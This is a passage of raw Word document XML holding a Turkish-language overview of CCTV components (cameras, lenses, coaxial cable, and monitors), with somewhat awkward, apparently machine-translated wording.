        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005B6F3F" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B6F3F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>CCTV Components(</w:t>
      </w:r>
      <w:r w:rsidRPr="005B6F3F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CCTV Bileşenleri)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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5B36CB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">CCTV'nin en çekici yönlerinden biri, bileşen parçalarının göreceli sadeliğidir. </w:t>
      </w:r>
      <w:r w:rsidRPr="005B36CB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Herhangi bir sistemde olduğu gibi, yapılandırma sadece en zayıf link kadar iyi olabilir</w:t>
      </w:r>
      <w:r w:rsidRPr="005B36CB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="005B36CB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>En yüksek kaliteli ses sistemindeki pahalı olmayan hoparlörler, ucuz kaliteli sese neden olur.</w:t>
      </w:r>
      <w:r w:rsidRPr="005B36CB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="005B36CB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Aynı şekilde, bir CCTV sistemindeki düşük kaliteli bir bileşen kötü sonuçlar vermektedir. Temel olarak dört bileşen grubu vardır:</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Pr="005B36CB" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B36CB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1-</w:t>
      </w:r>
      <w:r w:rsidRPr="005B36CB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kameralar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005B36CB"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5B36CB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2-</w:t>
      </w:r>
      <w:r w:rsidRPr="005B36CB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>İletim ortamı</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005B36CB" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B36CB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>3-</w:t>
      </w:r>
      <w:r w:rsidRPr="005B36CB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Monitörler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B36CB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4-Çevre Birimleri</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005B6F3F" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B6F3F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kameralar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B36CB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Kameranın görevi, istenen görüntüleme alanının görüntülerini toplamaktır ve bir CCTV sistemi yapılandırırken en çok göz önünde bulundurulması gereken bileşendir. </w:t>
      </w:r>
      <w:r w:rsidRPr="005B36CB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tipik bir kurulumda amera hedefi aydınlatmak için görünür ışığa dayanır; yansıyan ışık daha sonra kamera merceğinden toplanır ve işlenecek sistemden geri iletilen elektronik bir sinyale dönüştürülür. Kamera gövdesi, görünür ışığı elektronik sinyale dönüştüren bileşenleri içerir.</w:t>
      </w:r>
      <w:r w:rsidRPr="005B36CB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005B36CB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Analog sinyal üreten, halen iyi kalitede vakum tüplü kameralar var.</w:t>
      </w:r>
      <w:r w:rsidRPr="005B36CB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005B36CB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ancak günümüzde kullanılan kameraların çoğu dijital sinyal çıkışı üreten katı hal cihazlarıdır</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005B36CB" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B36CB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Bir kameranın hassasiyeti, görüntüleme yüzeyindeki alıcıların sayısını belirtir ve çıktının çözünürlüğünü belirler; alıcı sayısı arttıkça, çözünürlük de artar. İnsanları yüksek düzeyde bir kesinlik ile tanımlamaya ihtiyaç duyulursa, yüksek hassasiyete sahip renkli bir kamera düşünülmelidir. Öte yandan, sistemin amacı öncelikle trafiği gözlemlemekse, daha düşük hassasiyete sahip basit bir siyah-beyaz kamera yeterli olacaktır. </w:t>
      </w:r>
      <w:r w:rsidRPr="005B36CB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Kameraların boyutu, büyük bir ayakkabı kutusunun dışa doğru açık bir boyutundan çok gizli bir boyuta kadar değişebilir.</w:t>
      </w:r>
      <w:r w:rsidRPr="005B36CB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Minyatür kameralar bir insanın varlığını tespit etmek için yeterince saygın bir görüntü üretebilse de, çoğu pozitif tanımlama için kullanılabilecek bir görüntü kalitesi üretmek için yeterince yansıtıcı ışık toplamaz. Bu, hızlı gelişme gösteren teknolojinin bir alanıdır.</w:t>
      </w:r>
      <w:r w:rsidRPr="005B36CB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Kameraların yerleştirilmesinde görev için bir uzmana danışılması gereken çok fazla husus var.</w:t>
      </w:r>
      <w:r w:rsidRPr="005B36CB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bu düşüncelerden bazıları, hedeflenen kapsamın tesisin içinde mi yoksa dışında mı olduğunu içerir. Harici kameraların, tesise olan tüm yaklaşımların gözlenebileceği ve böylece kör noktaları ortadan kaldırabilecek şekilde konumlandırılması gerekir. Kamera, kolayca devre dışı bırakılamayacak kadar yüksek bir yere yerleştirilmelidir, ancak sahnedeki görüntülerin yalnızca insanların kafalarının üst kısımlarını üretmesi ve kameranın servisi zordur. Kamera montajında, genellikle bir kaydırma / eğme sürücüsü olarak adlandırılan, sola ve sağa (kaydırma) veya yukarı ve aşağı (eğme) amaçlayan motor sürücüleri bulunabilir. Ek olarak, kamera tesisin dış kısmındaysa, iç sıcaklığın zarar verici seviyelere ulaşmasını önlemek için güneşlik kullanılması gerekebilir. Buzlanmayı engellemek için ısıtma sağlayabilecek bir montaj, aşırı soğuk bölgelerde dikkate alınmalıdır, böylece kar ve buz pan / tilt sürücüsüne zarar vermeyecektir. Dahili kameralar eşit miktarda düşünmeyi gerektirir; ve yine, kaplanacak alan ve ortam ışığı yerleşimde büyük bir rol oynayacaktır. Kameralar açık veya gizli olabilir ve yüksek değerli varlıklardan ya da portallardan gelen ya da gelen insanların </w:t>
      </w:r>
      <w:r w:rsidRPr="00D53D5C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>gözlenebileceği</w:t>
      </w:r>
      <w:r w:rsidRPr="005B36CB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> şekilde konumlandırılması gerekecektir. Görüntünün kalitesi yansıtıcı ışığa büyük ölçüde dayandığından, kameradaki lens mevcut ışığı iyi kullanmak için dikkatlice seçilmelidir. Kameralar, yaklaşmakta olan insanlara veya nesnelere gölge gelmesini önlemek için ön </w:t>
      </w:r>
      <w:r w:rsidRPr="005B36CB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>aydınlatmayı (kameranın hedeflendiği şekilde parlayan ışıklar) sağlamak için kamera ile birlikte çalışacak şekilde yerleştirilmelidir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="212121"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B36CB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sürekli değişen güneş ışığı açısının, atmosferik koşulların değişmesi, yüksek oranda yansıtıcı yağmur veya kar yağışı ve akşamları yapay aydınlatmaya geçişin etkilerini barındıracak lenslerde sürekli ayarlamalar yapılmalıdır; hepsi ortam ışığını etkiler Bu en iyi otomatik iris kullanımıyla gerçekleştirilir. Kameradaki iris, tıpkı insan gözünde olduğu gibi, görüntüleme yüzeyine ulaşan ışık miktarını ayarlamak için açılır ve kapanır. Yoğun bir ışık kaynağına doğrudan maruz kalmak görüntünün çiçeklenmesini sağlar - görüntünün tamamen beyaz olduğu ve görüntüyü hiçbir şeyin görünmediği noktaya kadar yıkar - ve ayrıca fotoğraf makinesinin içindeki görüntüleme yüzeyinde ciddi hasara neden olabilir. Kameranın en önemli unsurlarından biri mercek. Temel olarak dört tür mercek vardır: standart, geniş açılı, telefoto ve yakınlaştırma. İnsan gözüyle karşılaştırıldığında, standart lens kaba bir eşdeğerdir; geniş açı, insanların görebildiklerinden daha geniş bir sahnede gerçekleşir; telefoto büyütülmüş ve kabaca bir teleskoptan bakmaya eşdeğerdir. Hepsi sabit odak uzaklığı lensleridir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="212121"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="212121"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D53D5C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D53D5C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>İletim Medyası</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="212121"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B36CB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>İletim ortamı, kameralardan gelen video sinyalinin  monitöre nasıl taşınacağına işaret eder. Bu genellikle bir tür kablolamadır.</w:t>
      </w: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r w:rsidRPr="00D53D5C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Koaksiyel kablo</w:t>
      </w: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D53D5C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Şimdiye kadar en sık kullanılan medya koaksiyel kablolardır. Farklı koaksiyel kablo sınıfları vardır ve kablonun kalitesi videonun kalitesi üzerinde derin bir etkiye sahip olacaktır. Koaksiyel kablo, etrafını çevreleyen piezoelektrik yalıtkanlı tek bir merkez iletkenden oluşur. Yalıtım daha sonra bir folyo kaplamaya sarılır ve ayrıca bir tel örgü ile sarılır. Orta iletkenden geçerken sinyale karşı güçlü bir koruma sağlayan dayanıklı bir tel üretmek üzere tüm demetin etrafına hava koşullarına dayanıklı izolasyon kaplaması yapılır. Merkez iletken, tek bir katı tel veya çoklu malzemeden yapılmış tek bir iletken olabilir tel telleri. Mühendisler, bir video sinyali için en iyi iletkenin saf bakır olduğu konusunda hemfikirdir. Ekranlama miktarı, orta iletken için koruma seviyesini belirleyecektir. Ekran, bağlantının her iki ucunda topraklanır ve böylece elektromanyetik radyasyondan toprağa fazladan bir gürültü yayılır. Yüzde 100 saf bakır elektronik sinyalin mükemmel bir iletkeni olmasına rağmen, hala bir seviye sonunda sinyalin gücünü bozacak iç direnç. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D53D5C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Sinyal gücü kaybının üstesinden gelmek için, orta hat iletkeni çapı ve ekranlama miktarı, hat içi bir tekrarlayıcı / amplifikatör gerekmeden önce daha fazla iletim uzunluğu elde etmek için arttırılabilir. Kablonun bu yönü bir endüstri sınıfında ifade edilir. Sinyalin hareket etmesi gereken mesafe ne kadar uzak olursa, koaksiyel kablonun derecesi de o kadar yüksek olur. kullanılması gereken veya fark edilebilir bir sinyal bozulması meydana gelecektir.</w:t>
      </w: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r w:rsidRPr="00D53D5C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Ekran</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005B6F3F"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olor w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Monitör, sinyalleri kameralardan görünür bir görüntüye dönüştürmek için kullanılır. Monitör, gerçek zamanlı gözlem veya önceden kaydedilmiş verilerin oynatılması için kullanılabilir.</w:t>
      </w:r>
      <w:r w:rsidRPr="005B6F3F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Renkli veya siyah beyaz video monitörleri mevcuttur, ancak standart bir televizyon setinden biraz farklıdır. UHF ve VHF frekans spektrumlarında yayınlanan sinyalleri dönüştürmek ve bu sinyalleri görüntülerin görünür bir görüntüsüne dönüştürmek için elektronik bir televizyon seti gelecek.</w:t>
      </w:r>
      <w:r w:rsidRPr="005B6F3F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">CCTV monitörü bu tür bir elektronik  cihazla birlikte gelmez ve standart 75 ohm'luk bir empedanslı video sinyalinin sinyallerini görünür görüntülerde işlemek için tasarlanmıştır. Bu, </w:t>
      </w:r>
      <w:r w:rsidRPr="005B6F3F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>bir televizyon setinin video monitörü olarak kullanılamayacağı anlamına gelmez, ancak videoyu televizyonun işleyebileceği bir sinyale dönüştürmek için uygun zayıflama ekipmanına ihtiyaç duyulacaktır. özünürlük çizgileri görüntünün detayını ve genel netliğ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
